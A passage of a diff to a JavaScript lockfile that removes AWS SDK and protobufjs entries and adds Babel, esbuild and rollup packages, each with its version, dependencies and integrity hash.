"sha512-m4X56gxG76/CKfxNVbOFuYwnAZcHgS6HOH8lgp15HoGHIAVTcZfZrXvcYzJFOMLEJgVn+JHBu6EiNV+xSNXXFg=="], - - "@aws-sdk/middleware-eventstream": ["@aws-sdk/middleware-eventstream@3.972.10", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/protocol-http": "^5.3.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-QUqLs7Af1II9X4fCRAu+EGHG3KHyOp4RkuLhRKoA3NuFlh6TL8i+zXBl8w2LUxqm44B/Kom45hgSlwA1SpTsXQ=="], - - "@aws-sdk/middleware-host-header": ["@aws-sdk/middleware-host-header@3.972.10", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/protocol-http": "^5.3.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-IJSsIMeVQ8MMCPbuh1AbltkFhLBLXn7aejzfX5YKT/VLDHn++Dcz8886tXckE+wQssyPUhaXrJhdakO2VilRhg=="], - - "@aws-sdk/middleware-logger": ["@aws-sdk/middleware-logger@3.972.10", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-OOuGvvz1Dm20SjZo5oEBePFqxt5nf8AwkNDSyUHvD9/bfNASmstcYxFAHUowy4n6Io7mWUZ04JURZwSBvyQanQ=="], - - "@aws-sdk/middleware-recursion-detection": ["@aws-sdk/middleware-recursion-detection@3.972.11", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@aws/lambda-invoke-store": "^0.2.2", "@smithy/protocol-http": "^5.3.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-+zz6f79Kj9V5qFK2P+D8Ehjnw4AhphAlCAsPjUqEcInA9umtSSKMrHbSagEeOIsDNuvVrH98bjRHcyQukTrhaQ=="], - - "@aws-sdk/middleware-sdk-s3": ["@aws-sdk/middleware-sdk-s3@3.972.37", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-arn-parser": "^3.972.3", "@smithy/core": "^3.23.17", "@smithy/node-config-provider": "^4.3.14", "@smithy/protocol-http": "^5.3.14", "@smithy/signature-v4": "^5.3.14", "@smithy/smithy-client": "^4.12.13", "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", "@smithy/util-middleware": "^4.2.14", "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" } }, "sha512-Km7M+i8DrLArVzrid1gfxeGhYHBd3uxvE77g0s5a52zPSVosxzQBnJ0gwWb6NIp/DOk8gsBMhi7V+cpJG0ndTA=="], - - "@aws-sdk/middleware-user-agent": ["@aws-sdk/middleware-user-agent@3.972.38", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-endpoints": "^3.996.8", "@smithy/core": "^3.23.17", "@smithy/protocol-http": "^5.3.14", "@smithy/types": "^4.14.1", "@smithy/util-retry": "^4.3.6", "tslib": "^2.6.2" } }, "sha512-iz+B29TXcAZsJpwB+AwG/TTGA5l/VnmMZ2UxtiySOZjI6gCdmviXPwdgzcmuazMy16rXoPY4mYCGe7zdNKfx5A=="], - - "@aws-sdk/middleware-websocket": ["@aws-sdk/middleware-websocket@3.972.16", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-format-url": "^3.972.10", "@smithy/eventstream-codec": "^4.2.14", "@smithy/eventstream-serde-browser": "^4.2.14", "@smithy/fetch-http-handler": "^5.3.17", "@smithy/protocol-http": "^5.3.14", "@smithy/signature-v4": "^5.3.14", "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "@smithy/util-hex-encoding": "^4.2.2", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" } }, "sha512-86+S9oCyRVGzoMRpQhxkArp7kD2K75GPmaNevd9B6EyNhWoNvnCZZ3WbgN4j7ZT+jvtvBCGZvI2XHsWZJ+BRIg=="], - - "@aws-sdk/nested-clients": ["@aws-sdk/nested-clients@3.997.6", "", { "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", "@aws-sdk/core": "^3.974.8", "@aws-sdk/middleware-host-header": "^3.972.10", "@aws-sdk/middleware-logger": "^3.972.10", "@aws-sdk/middleware-recursion-detection": "^3.972.11", "@aws-sdk/middleware-user-agent": "^3.972.38", "@aws-sdk/region-config-resolver": "^3.972.13", "@aws-sdk/signature-v4-multi-region": "^3.996.25", "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-endpoints": "^3.996.8", "@aws-sdk/util-user-agent-browser": "^3.972.10", "@aws-sdk/util-user-agent-node": "^3.973.24", "@smithy/config-resolver": "^4.4.17", "@smithy/core": "^3.23.17", "@smithy/fetch-http-handler": "^5.3.17", "@smithy/hash-node": "^4.2.14", "@smithy/invalid-dependency": "^4.2.14", "@smithy/middleware-content-length": "^4.2.14", "@smithy/middleware-endpoint": "^4.4.32", "@smithy/middleware-retry": "^4.5.7", "@smithy/middleware-serde": "^4.2.20", "@smithy/middleware-stack": "^4.2.14", "@smithy/node-config-provider": "^4.3.14", "@smithy/node-http-handler": "^4.6.1", "@smithy/protocol-http": "^5.3.14", "@smithy/smithy-client": "^4.12.13", "@smithy/types": "^4.14.1", "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", "@smithy/util-defaults-mode-browser": "^4.3.49", "@smithy/util-defaults-mode-node": "^4.2.54", "@smithy/util-endpoints": "^3.4.2", "@smithy/util-middleware": "^4.2.14", "@smithy/util-retry": "^4.3.6", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" } }, "sha512-WBDnqatJl+kGObpfmfSxqnXeYTu3Me8wx8WCtvoxX3pfWrrTv8I4WTMSSs7PZqcRcVh8WeUKMgGFjMG+52SR1w=="], - - "@aws-sdk/region-config-resolver": ["@aws-sdk/region-config-resolver@3.972.13", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/config-resolver": "^4.4.17", "@smithy/node-config-provider": "^4.3.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-CvJ2ZIjK/jVD/lbOpowBVElJyC1YxLTIJ13yM0AEo0t2v7swOzGjSA6lJGH+DwZXQhcjUjoYwc8bVYCX5MDr1A=="], - - "@aws-sdk/signature-v4-multi-region": ["@aws-sdk/signature-v4-multi-region@3.996.25", "", { "dependencies": { "@aws-sdk/middleware-sdk-s3": "^3.972.37", "@aws-sdk/types": "^3.973.8", "@smithy/protocol-http": "^5.3.14", "@smithy/signature-v4": "^5.3.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-+CMIt3e1VzlklAECmG+DtP1sV8iKq25FuA0OKpnJ4KA0kxUtd7CgClY7/RU6VzJBQwbN4EJ9Ue6plvqx1qGadw=="], - - "@aws-sdk/token-providers": ["@aws-sdk/token-providers@3.1045.0", "", { "dependencies": { "@aws-sdk/core": "^3.974.8", "@aws-sdk/nested-clients": "^3.997.6", "@aws-sdk/types": "^3.973.8", "@smithy/property-provider": "^4.2.14", "@smithy/shared-ini-file-loader": "^4.4.9", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-/o4qcty0DmQola0DBniRVeBakYY6ALOvKEFo1AtJpTmMn/cJ+Fk3RWGe5ieT/f/eYbHG9k5E7poKge/E+WGv4Q=="], - - "@aws-sdk/types": ["@aws-sdk/types@3.973.8", "", { "dependencies": { "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-gjlAdtHMbtR9X5iIhVUvbVcy55KnznpC6bkDUWW9z915bi0ckdUr5cjf16Kp6xq0bP5HBD2xzgbL9F9Quv5vUw=="], - - "@aws-sdk/util-arn-parser": ["@aws-sdk/util-arn-parser@3.972.3", "", { "dependencies": { "tslib": "^2.6.2" } }, "sha512-HzSD8PMFrvgi2Kserxuff5VitNq2sgf3w9qxmskKDiDTThWfVteJxuCS9JXiPIPtmCrp+7N9asfIaVhBFORllA=="], - - "@aws-sdk/util-endpoints": ["@aws-sdk/util-endpoints@3.996.8", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/types": "^4.14.1", "@smithy/url-parser": "^4.2.14", "@smithy/util-endpoints": "^3.4.2", "tslib": "^2.6.2" } }, "sha512-oOZHcRDihk5iEe5V25NVWg45b3qEA8OpHWVdU/XQh8Zj4heVPAJqWvMphQnU7LkufmUo10EpvFPZuQMiFLJK3g=="], - - "@aws-sdk/util-format-url": ["@aws-sdk/util-format-url@3.972.10", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/querystring-builder": "^4.2.14", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-DEKiHNJVtNxdyTeQspzY+15Po/kHm6sF0Cs4HV9Q2+lplB63+DrvdeiSoOSdWEWAoO2RcY1veoXVDz2tWxWCgQ=="], - - "@aws-sdk/util-locate-window": ["@aws-sdk/util-locate-window@3.965.5", "", { "dependencies": { "tslib": "^2.6.2" } }, "sha512-WhlJNNINQB+9qtLtZJcpQdgZw3SCDCpXdUJP7cToGwHbCWCnRckGlc6Bx/OhWwIYFNAn+FIydY8SZ0QmVu3xTQ=="], - - "@aws-sdk/util-user-agent-browser": ["@aws-sdk/util-user-agent-browser@3.972.10", "", { "dependencies": { "@aws-sdk/types": "^3.973.8", "@smithy/types": "^4.14.1", "bowser": "^2.11.0", "tslib": "^2.6.2" } }, "sha512-FAzqXvfEssGdSIz8ejatan0bOdx1qefBWKF/gWmVBXIP1HkS7v/wjjaqrAGGKvyihrXTXW00/2/1nTJtxpXz7g=="], - - "@aws-sdk/util-user-agent-node": ["@aws-sdk/util-user-agent-node@3.973.24", "", { "dependencies": { "@aws-sdk/middleware-user-agent": "^3.972.38", "@aws-sdk/types": "^3.973.8", "@smithy/node-config-provider": "^4.3.14", "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", "tslib": "^2.6.2" }, "peerDependencies": { "aws-crt": ">=1.0.0" }, "optionalPeers": ["aws-crt"] }, "sha512-ZWwlkjcIp7cEL8ZfTpTAPNkwx25p7xol0xlKoWVVf22+nsjwmLcHYtTPjIV1cSpmB/b6DaK4cb1fSkvCXHgRdw=="], - - "@aws-sdk/xml-builder": ["@aws-sdk/xml-builder@3.972.22", "", { "dependencies": { "@nodable/entities": "2.1.0", "@smithy/types": "^4.14.1", "fast-xml-parser": "5.7.2", "tslib": "^2.6.2" } }, "sha512-PMYKKtJd70IsSG0yHrdAbxBr+ZWBKLvzFZfD3/urxgf6hXVMzuU5M+3MJ5G67RpOmLBu1fAUN65SbWuKUCOlAA=="], - - "@aws/lambda-invoke-store": ["@aws/lambda-invoke-store@0.2.4", "", {}, "sha512-iY8yvjE0y651BixKNPgmv1WrQc+GZ142sb0z4gYnChDDY2YqI4P/jsSopBWrKfAt7LOJAkOXt7rC/hms+WclQQ=="], - "@babel/code-frame": ["@babel/code-frame@7.29.0", "", { "dependencies": { "@babel/helper-validator-identifier": "^7.28.5", "js-tokens": "^4.0.0", "picocolors": "^1.1.1" } }, "sha512-9NhCeYjq9+3uxgdtp20LSiJXJvN0FeCtNGpJxuMFZ1Kv3cWUNb6DOhJwUvcVCzKGR66cw4njwM6hrJLqgOwbcw=="], + "@babel/compat-data": ["@babel/compat-data@7.29.3", "", {}, "sha512-LIVqM46zQWZhj17qA8wb4nW/ixr2y1Nw+r1etiAWgRM6U1IqP+LNhL1yg440jYZR72jCWcWbLWzIosH+uP1fqg=="], + + "@babel/core": ["@babel/core@7.29.0", "", { "dependencies": { "@babel/code-frame": "^7.29.0", "@babel/generator": "^7.29.0", "@babel/helper-compilation-targets": "^7.28.6", "@babel/helper-module-transforms": "^7.28.6", "@babel/helpers": "^7.28.6", "@babel/parser": "^7.29.0", "@babel/template": "^7.28.6", "@babel/traverse": "^7.29.0", "@babel/types": "^7.29.0", "@jridgewell/remapping": "^2.3.5", "convert-source-map": "^2.0.0", "debug": "^4.1.0", "gensync": "^1.0.0-beta.2", "json5": "^2.2.3", "semver": "^6.3.1" } }, "sha512-CGOfOJqWjg2qW/Mb6zNsDm+u5vFQ8DxXfbM09z69p5Z6+mE1ikP2jUXw+j42Pf1XTYED2Rni5f95npYeuwMDQA=="], + "@babel/generator": ["@babel/generator@7.29.1", "", { "dependencies": { "@babel/parser": "^7.29.0", "@babel/types": "^7.29.0", "@jridgewell/gen-mapping": "^0.3.12", "@jridgewell/trace-mapping": "^0.3.28", "jsesc": "^3.0.2" } }, "sha512-qsaF+9Qcm2Qv8SRIMMscAvG4O3lJ0F1GuMo5HR/Bp02LopNgnZBC/EkbevHFeGs4ls/oPz9v+Bsmzbkbe+0dUw=="], + "@babel/helper-compilation-targets": ["@babel/helper-compilation-targets@7.28.6", "", { "dependencies": { "@babel/compat-data": "^7.28.6", "@babel/helper-validator-option": "^7.27.1", "browserslist": "^4.24.0", "lru-cache": "^5.1.1", "semver": "^6.3.1" } }, "sha512-JYtls3hqi15fcx5GaSNL7SCTJ2MNmjrkHXg4FSpOA/grxK8KwyZ5bubHsCq8FXCkua6xhuaaBit+3b7+VZRfcA=="], + "@babel/helper-globals": ["@babel/helper-globals@7.28.0", "", {}, "sha512-+W6cISkXFa1jXsDEdYA8HeevQT/FULhxzR99pxphltZcVaugps53THCeiWA8SguxxpSp3gKPiuYfSWopkLQ4hw=="], + "@babel/helper-module-imports": ["@babel/helper-module-imports@7.28.6", "", { "dependencies": { "@babel/traverse": "^7.28.6", "@babel/types": "^7.28.6" } }, "sha512-l5XkZK7r7wa9LucGw9LwZyyCUscb4x37JWTPz7swwFE/0FMQAGpiWUZn8u9DzkSBWEcK25jmvubfpw2dnAMdbw=="], + + "@babel/helper-module-transforms": ["@babel/helper-module-transforms@7.28.6", "", { "dependencies": { "@babel/helper-module-imports": "^7.28.6", "@babel/helper-validator-identifier": "^7.28.5", "@babel/traverse": "^7.28.6" }, "peerDependencies": { "@babel/core": "^7.0.0" } }, "sha512-67oXFAYr2cDLDVGLXTEABjdBJZ6drElUSI7WKp70NrpyISso3plG9SAGEF6y7zbha/wOzUByWWTJvEDVNIUGcA=="], + + "@babel/helper-plugin-utils": ["@babel/helper-plugin-utils@7.28.6", "", {}, "sha512-S9gzZ/bz83GRysI7gAD4wPT/AI3uCnY+9xn+Mx/KPs2JwHJIz1W8PZkg2cqyt3RNOBM8ejcXhV6y8Og7ly/Dug=="], + "@babel/helper-string-parser": ["@babel/helper-string-parser@7.27.1", "", {}, "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA=="], "@babel/helper-validator-identifier": ["@babel/helper-validator-identifier@7.28.5", "", {}, "sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q=="], + "@babel/helper-validator-option": ["@babel/helper-validator-option@7.27.1", "", {}, "sha512-YvjJow9FxbhFFKDSuFnVCe2WxXk1zWc22fFePVNEaWJEu8IrZVlda6N0uHwzZrUM1il7NC9Mlp4MaJYbYd9JSg=="], + + "@babel/helpers": ["@babel/helpers@7.29.2", "", { "dependencies": { "@babel/template": "^7.28.6", "@babel/types": "^7.29.0" } }, "sha512-HoGuUs4sCZNezVEKdVcwqmZN8GoHirLUcLaYVNBK2J0DadGtdcqgr3BCbvH8+XUo4NGjNl3VOtSjEKNzqfFgKw=="], + "@babel/parser": ["@babel/parser@7.29.3", "", { "dependencies": { "@babel/types": "^7.29.0" }, "bin": "./bin/babel-parser.js" }, "sha512-b3ctpQwp+PROvU/cttc4OYl4MzfJUWy6FZg+PMXfzmt/+39iHVF0sDfqay8TQM3JA2EUOyKcFZt75jWriQijsA=="], + "@babel/plugin-syntax-jsx": ["@babel/plugin-syntax-jsx@7.28.6", "", { "dependencies": { "@babel/helper-plugin-utils": "^7.28.6" }, "peerDependencies": { "@babel/core": "^7.0.0-0" } }, "sha512-wgEmr06G6sIpqr8YDwA2dSRTE3bJ+V0IfpzfSY3Lfgd7YWOaAdlykvJi13ZKBt8cZHfgH1IXN+CL656W3uUa4w=="], + "@babel/runtime": ["@babel/runtime@7.29.2", "", {}, "sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g=="], "@babel/template": ["@babel/template@7.28.6", "", { "dependencies": { "@babel/code-frame": "^7.28.6", "@babel/parser": "^7.28.6", "@babel/types": "^7.28.6" } }, "sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ=="], @@ -387,7 +341,51 @@ "@emnapi/wasi-threads": ["@emnapi/wasi-threads@1.2.1", "", { "dependencies": { "tslib": "^2.4.0" } }, "sha512-uTII7OYF+/Mes/MrcIOYp5yOtSMLBWSIoLPpcgwipoiKbli6k322tcoFsxoIIxPDqW01SQGAgko4EzZi2BNv2w=="], - "@google/genai": ["@google/genai@1.52.0", "", { "dependencies": { "google-auth-library": "^10.3.0", "p-retry": "^4.6.2", "protobufjs": "^7.5.4", "ws": "^8.18.0" }, "peerDependencies": { "@modelcontextprotocol/sdk": "^1.25.2" }, "optionalPeers": ["@modelcontextprotocol/sdk"] }, "sha512-gwSvbpiN/17O9TbsqSsE/OzZcpv5Fo4RQjdngGgogtuB9RsyJ8ZHhX5KjHj1bp5N9snN2eK8LDGXSaWW2hof8Q=="], + "@esbuild/aix-ppc64": ["@esbuild/aix-ppc64@0.21.5", "", { "os": "aix", "cpu": "ppc64" }, "sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ=="], + + "@esbuild/android-arm": ["@esbuild/android-arm@0.21.5", "", { "os": "android", "cpu": "arm" }, "sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg=="], + + "@esbuild/android-arm64": ["@esbuild/android-arm64@0.21.5", "", { "os": "android", "cpu": "arm64" }, "sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A=="], + + "@esbuild/android-x64": ["@esbuild/android-x64@0.21.5", "", { "os": "android", "cpu": "x64" }, "sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA=="], + + "@esbuild/darwin-arm64": ["@esbuild/darwin-arm64@0.21.5", "", { "os": "darwin", "cpu": "arm64" }, "sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ=="], + + "@esbuild/darwin-x64": ["@esbuild/darwin-x64@0.21.5", "", { "os": "darwin", "cpu": "x64" }, "sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw=="], + + "@esbuild/freebsd-arm64": ["@esbuild/freebsd-arm64@0.21.5", "", { "os": "freebsd", "cpu": "arm64" }, "sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g=="], + + "@esbuild/freebsd-x64": ["@esbuild/freebsd-x64@0.21.5", "", { "os": "freebsd", "cpu": "x64" }, "sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ=="], + + "@esbuild/linux-arm": ["@esbuild/linux-arm@0.21.5", "", { "os": "linux", "cpu": "arm" }, "sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA=="], + + "@esbuild/linux-arm64": ["@esbuild/linux-arm64@0.21.5", "", { "os": "linux", "cpu": "arm64" }, "sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q=="], + + "@esbuild/linux-ia32": ["@esbuild/linux-ia32@0.21.5", "", { "os": "linux", "cpu": "ia32" }, "sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg=="], + + "@esbuild/linux-loong64": ["@esbuild/linux-loong64@0.21.5", "", { "os": "linux", "cpu": "none" }, "sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg=="], + + "@esbuild/linux-mips64el": ["@esbuild/linux-mips64el@0.21.5", "", { "os": "linux", "cpu": "none" }, "sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg=="], + + "@esbuild/linux-ppc64": ["@esbuild/linux-ppc64@0.21.5", "", { "os": "linux", "cpu": "ppc64" }, "sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w=="], + + "@esbuild/linux-riscv64": ["@esbuild/linux-riscv64@0.21.5", "", { "os": "linux", "cpu": "none" }, "sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA=="], + + "@esbuild/linux-s390x": ["@esbuild/linux-s390x@0.21.5", "", { "os": "linux", "cpu": "s390x" }, "sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A=="], + + "@esbuild/linux-x64": ["@esbuild/linux-x64@0.21.5", "", { "os": "linux", "cpu": "x64" }, "sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ=="], + + "@esbuild/netbsd-x64": ["@esbuild/netbsd-x64@0.21.5", "", { "os": "none", "cpu": "x64" }, "sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg=="], + + "@esbuild/openbsd-x64": ["@esbuild/openbsd-x64@0.21.5", "", { "os": "openbsd", "cpu": "x64" }, "sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow=="], + + "@esbuild/sunos-x64": ["@esbuild/sunos-x64@0.21.5", "", { "os": "sunos", "cpu": "x64" }, "sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg=="], + + "@esbuild/win32-arm64": ["@esbuild/win32-arm64@0.21.5", "", { "os": "win32", "cpu": "arm64" }, "sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A=="], + + "@esbuild/win32-ia32": ["@esbuild/win32-ia32@0.21.5", "", { "os": "win32", "cpu": "ia32" }, "sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA=="], + + "@esbuild/win32-x64": ["@esbuild/win32-x64@0.21.5", "", { "os": "win32", "cpu": "x64" }, "sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw=="], "@inquirer/ansi": ["@inquirer/ansi@2.0.5", "", {}, "sha512-doc2sWgJpbFQ64UflSVd17ibMGDuxO1yKgOgLMwavzESnXjFWJqUeG8saYosqKpHp4kWiM5x1nXvEjbpx90gzw=="], @@ -597,110 +595,90 @@ "@opentelemetry/semantic-conventions": ["@opentelemetry/semantic-conventions@1.41.1", "", {}, "sha512-/UhIkaZgPutTFmQ7RnIJGgDXZmtEJ7Dvi86xNTFWcnRxVRNk/aotsqDJYeEvDP+FSMB2SdW+pQzNMcWP0rwuNA=="], - "@protobufjs/aspromise": ["@protobufjs/aspromise@1.1.2", "", {}, "sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ=="], - - "@protobufjs/base64": ["@protobufjs/base64@1.1.2", "", {}, "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg=="], - - "@protobufjs/codegen": ["@protobufjs/codegen@2.0.5", "", {}, "sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g=="], - - "@protobufjs/eventemitter": ["@protobufjs/eventemitter@1.1.0", "", {}, "sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q=="], - - "@protobufjs/fetch": ["@protobufjs/fetch@1.1.0", "", { "dependencies": { "@protobufjs/aspromise": "^1.1.1", "@protobufjs/inquire": "^1.1.0" } }, "sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ=="], - - "@protobufjs/float": ["@protobufjs/float@1.0.2", "", {}, "sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ=="], - - "@protobufjs/inquire": ["@protobufjs/inquire@1.1.1", "", {}, "sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew=="], - - "@protobufjs/path": ["@protobufjs/path@1.1.2", "", {}, "sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA=="], - - "@protobufjs/pool": ["@protobufjs/pool@1.1.0", "", {}, "sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw=="], - - "@protobufjs/utf8": ["@protobufjs/utf8@1.1.1", "", {}, "sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg=="], - "@puppeteer/browsers": ["@puppeteer/browsers@2.13.2", "", { "dependencies": { "debug": "^4.4.3", "extract-zip": "^2.0.1", "progress": "^2.0.3", "proxy-agent": "^6.5.0", "semver": "^7.7.4", "tar-fs": "^3.1.1", "yargs": "^17.7.2" }, "bin": { "browsers": "lib/cjs/main-cli.js" } }, "sha512-5EUZSUIc37H6aIXyWO0Z4y8NlF8NnjgmqeQgOGiswAU7pY0HOo16ho4+alIWmSfdZnjqBRawMsP3I5YqLSn6kw=="], - "@smithy/config-resolver": ["@smithy/config-resolver@4.5.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "tslib": "^2.6.2" } }, "sha512-m5PNfr7xKdIegNG8DlLz+Gf/DlAhHWFGmFbe0DZo9pnvBwuZ3P/9OMtQU0UyWMYy8zjl+HDFVS7rdD9p2xEFjQ=="], + "@rollup/rollup-android-arm-eabi": ["@rollup/rollup-android-arm-eabi@4.60.3", "", { "os": "android", "cpu": "arm" }, "sha512-x35CNW/ANXG3hE/EZpRU8MXX1JDN86hBb2wMGAtltkz7pc6cxgjpy1OMMfDosOQ+2hWqIkag/fGok1Yady9nGw=="], - "@smithy/core": ["@smithy/core@3.24.0", "", { "dependencies": { "@aws-crypto/crc32": "5.2.0", "@smithy/types": "^4.14.1", "tslib": "^2.6.2" } }, "sha512-rZ5YfycIXX6puoGjthnDiMpUgtKNOq3c7CndQYkCNYQTv26AiCrZQOJPy7ANSfZ6Okk3UvCRnmO1OYWlLnYZgg=="], + "@rollup/rollup-android-arm64": ["@rollup/rollup-android-arm64@4.60.3", "", { "os": "android", "cpu": "arm64" }, "sha512-xw3xtkDApIOGayehp2+Rz4zimfkaX65r4t47iy+ymQB2G4iJCBBfj0ogVg5jpvjpn8UWn/+q9tprxleYeNp3Hw=="], - "@smithy/credential-provider-imds": ["@smithy/credential-provider-imds@4.3.0", "", { "dependencies": { "@smithy/core": "^3.24.0", "@smithy/types": "^4.14.1", "tslib": 